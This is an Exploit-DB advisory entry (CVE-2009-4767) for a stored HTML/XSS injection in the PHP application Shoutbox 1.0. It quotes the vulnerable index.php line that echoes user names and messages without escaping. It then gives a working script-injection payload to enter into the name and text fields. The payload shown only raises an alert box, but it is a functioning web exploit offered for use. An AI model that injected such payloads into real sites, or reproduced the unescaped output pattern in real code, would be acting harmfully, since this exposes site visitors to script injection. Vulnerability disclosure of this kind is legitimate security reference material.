Shoutbox 1.0 HTML / XSS Injection

2009-11-18T00:00:00
ID EDB-ID:10168
Type exploitdb
Reporter SkuLL-HackeR
Modified 2009-11-18T00:00:00

Description

Shoutbox 1.0 HTML / Xss Injection. CVE-2009-4767. Webapps exploit for php platform

                                        
                                            # Vulnerable Code in index.php :
#
# <p><strong><?php echo $names[$i]; ?>:</strong> <?php echo $shouts[$i]; ?></p>
#
########################################
# Shoutbox 1.0 HTML / Xss inejction exploit
# AuTh0r  : SKuLL-HacKeR                                                
# H0ME     : Sec-Best & SaudiHack & S3curity-Art                        
# Email    : My@Hotmail.iT                                              
########################################
 
Vendor: http://www.plohni.com
exploit: 
site.com/Shoutbox/index.php
in the select your name and your text put this code 
'">><script>alert('XSS skh')</script>